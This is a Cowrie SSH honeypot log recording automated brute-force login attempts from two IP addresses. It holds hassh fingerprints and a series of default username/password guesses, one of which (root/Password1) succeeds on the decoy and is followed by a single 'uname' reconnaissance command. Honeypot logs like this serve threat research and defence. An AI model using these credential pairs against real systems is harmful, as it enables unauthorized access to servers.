{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:47:52.297625Z","src_ip":"212.227.125.160","session":"d480445224c1"}
{"eventid":"cowrie.login.failed","username":"keycloak","password":"keycloak","message":"login attempt [keycloak/keycloak] failed","sensor":"my-vps","timestamp":"2025-08-26T21:47:52.485625Z","src_ip":"212.227.125.160","session":"d480445224c1"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:47:53.548365Z","src_ip":"212.227.125.160","session":"d480445224c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45196,"dst_ip":"1.2.3.4","dst_port":22,"session":"e551a750dc25","protocol":"ssh","message":"New connection: 212.227.235.229:45196 (1.2.3.4:22) [session: e551a750dc25]","sensor":"my-vps","timestamp":"2025-08-26T21:47:57.386599Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50230,"dst_ip":"1.2.3.4","dst_port":22,"session":"5160f147ab59","protocol":"ssh","message":"New connection: 212.227.125.160:50230 (1.2.3.4:22) [session: 5160f147ab59]","sensor":"my-vps","timestamp":"2025-08-26T21:47:57.881084Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:47:57.895062Z","src_ip":"212.227.125.160","session":"5160f147ab59"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:47:57.949713Z","src_ip":"212.227.125.160","session":"5160f147ab59"}
{"eventid":"cowrie.login.failed","username":"debian","password":"123456789","message":"login attempt [debian/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T21:47:58.116048Z","src_ip":"212.227.125.160","session":"5160f147ab59"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:47:58.294169Z","src_ip":"212.227.235.229","session":"e551a750dc25"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:47:58.294818Z","src_ip":"212.227.235.229","session":"e551a750dc25"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:47:59.388359Z","src_ip":"212.227.125.160","session":"5160f147ab59"}
{"eventid":"cowrie.login.failed","username":"admin","password":"654321","message":"login attempt [admin/654321] failed","sensor":"my-vps","timestamp":"2025-08-26T21:48:02.035882Z","src_ip":"212.227.235.229","session":"e551a750dc25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45618,"dst_ip":"1.2.3.4","dst_port":22,"session":"880ba9affa8f","protocol":"ssh","message":"New connection: 212.227.125.160:45618 (1.2.3.4:22) [session: 880ba9affa8f]","sensor":"my-vps","timestamp":"2025-08-26T21:48:03.572099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:48:03.582488Z","src_ip":"212.227.125.160","session":"880ba9affa8f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:48:03.616838Z","src_ip":"212.227.125.160","session":"880ba9affa8f"}
{"eventid":"cowrie.login.failed","username":"digital","password":"digital","message":"login attempt [digital/digital] failed","sensor":"my-vps","timestamp":"2025-08-26T21:48:03.836562Z","src_ip":"212.227.125.160","session":"880ba9affa8f"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:48:04.065552Z","src_ip":"212.227.235.229","session":"e551a750dc25"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:48:04.882448Z","src_ip":"212.227.125.160","session":"880ba9affa8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41004,"dst_ip":"1.2.3.4","dst_port":22,"session":"24a17104c352","protocol":"ssh","message":"New connection: 212.227.125.160:41004 (1.2.3.4:22) [session: 24a17104c352]","sensor":"my-vps","timestamp":"2025-08-26T21:48:09.671462Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:48:09.672313Z","src_ip":"212.227.125.160","session":"24a17104c352"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:48:09.716832Z","src_ip":"212.227.125.160","session":"24a17104c352"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:48:09.853409Z","src_ip":"212.227.125.160","session":"24a17104c352"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:48:09.962642Z","src_ip":"212.227.125.160","session":"24a17104c352"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:48:09.963481Z","src_ip":"212.227.125.160","session":"24a17104c352"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:48:10.009169Z","src_ip":"212.227.125.160","session":"24a17104c352"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:48:10.010362Z","src_ip":"212.227.125.160","session":"24a17104c352"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36392,"dst_ip":"1.2.3.4","dst_port":22,"session":"481387a9c379","protocol":"ssh","message":"New connection: 212.227.125.160:36392 (1.2.3.4:22) [session: 481387a9c379]","sensor":"my-vps","timestamp":"2025-08-26T21:48:14.963322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:48:14.966868Z","src_ip":"212.227.125.160","session":"481387a9c379"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:48:15.282740Z","src_ip":"212.227.125.160","session":"481387a9c379"}
{"eventid":"cowrie.login.failed","username":"minecraft","password":"123456","message":"login attempt [minecraft/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:48:15.564709Z","src_ip":"212.227.125.160","session":"481387a9c379"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:48:16.620138Z","src_ip":"212.227.125.160","session":"481387a9c379"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60014,"dst_ip":"1.2.3.4","dst_port":22,"session":"458ae7d173b0","protocol":"ssh","message":"New connection: 212.227.125.160:60014 (1.2.3.4:22) [session: 458ae7d173b0]","sensor":"my-vps","timestamp":"2025-08-26T21:48:20.641166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:48:20.642077Z","src_ip":"212.227.125.160","session":"458ae7d173b0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:48:20.711358Z","src_ip":"212.227.125.160","session":"458ae7d173b0"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-08-26T21:48:20.875508Z","src_ip":"212.227.125.160","session":"458ae7d173b0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:48:21.927857Z","src_ip":"212.227.125.160","session":"458ae7d173b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55400,"dst_ip":"1.2.3.4","dst_port":22,"session":"42a4169b948a","protocol":"ssh","message":"New connection: 212.227.125.160:55400 (1.2.3.4:22) [session: 42a4169b948a]","sensor":"my-vps","timestamp":"2025-08-26T21:48:26.679871Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:48:26.681834Z","src_ip":"212.227.125.160","session":"42a4169b948a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:48:26.732779Z","src_ip":"212.227.125.160","session":"42a4169b948a"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-26T21:48:26.935374Z","src_ip":"212.227.125.160","session":"42a4169b948a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:48:28.120339Z","src_ip":"212.227.125.160","session":"42a4169b948a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50792,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5cf16297a61","protocol":"ssh","message":"New connection: 212.227.125.160:50792 (1.2.3.4:22) [session: d5cf16297a61]","sensor":"my-vps","timestamp":"2025-08-26T21:48:32.361325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:48:32.392780Z","src_ip":"212.227.125.160","session":"d5cf16297a61"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:48:32.415158Z","src_ip":"212.227.125.160","session":"d5cf16297a61"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"nagios","message":"login attempt [nagios/nagios] failed","sensor":"my-vps","timestamp":"2025-08-26T21:48:32.646853Z","src_ip":"212.227.125.160","session":"d5cf16297a61"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:48:33.701845Z","src_ip":"212.227.125.160","session":"d5cf16297a61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46178,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cf581166643","protocol":"ssh","message":"New connection: 212.227.125.160:46178 (1.2.3.4:22) [session: 4cf581166643]","sensor":"my-vps","timestamp":"2025-08-26T21:48:38.073010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:48:38.074786Z","src_ip":"212.227.125.160","session":"4cf581166643"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:48:38.123701Z","src_ip":"212.227.125.160","session":"4cf581166643"}
